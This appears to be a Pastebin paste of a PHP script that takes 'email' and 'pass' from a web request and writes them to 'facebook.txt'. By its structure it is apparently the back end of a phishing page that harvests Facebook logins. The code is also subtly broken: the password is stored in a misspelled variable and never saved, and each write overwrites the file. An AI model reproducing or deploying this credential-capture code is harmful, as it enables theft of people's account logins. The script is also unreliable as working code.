Guest User

Untitled

a guest
Apr 22nd, 2018
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.28 KB | None | 0 0
  1. <?php
  2. $email="";
  3. if (!empty($_REQUEST['email'])){
  4. $email=$_REQUEST['email'];
  5. }
  6.  
  7. $pass="";
  8. if (!empty($_REQUEST['pass'])){
  9. $apass=$_REQUEST['pass'];
  10. }
  11.  
  12. //Luego sobrescribo el txt
  13.  
  14. $archivo="facebook.txt";
  15.  
  16.      $file=fopen($archivo,"w");
  17.      fwrite($file,$email.$pass);
  18. ?>
Add Comment
Please, Sign In to add comment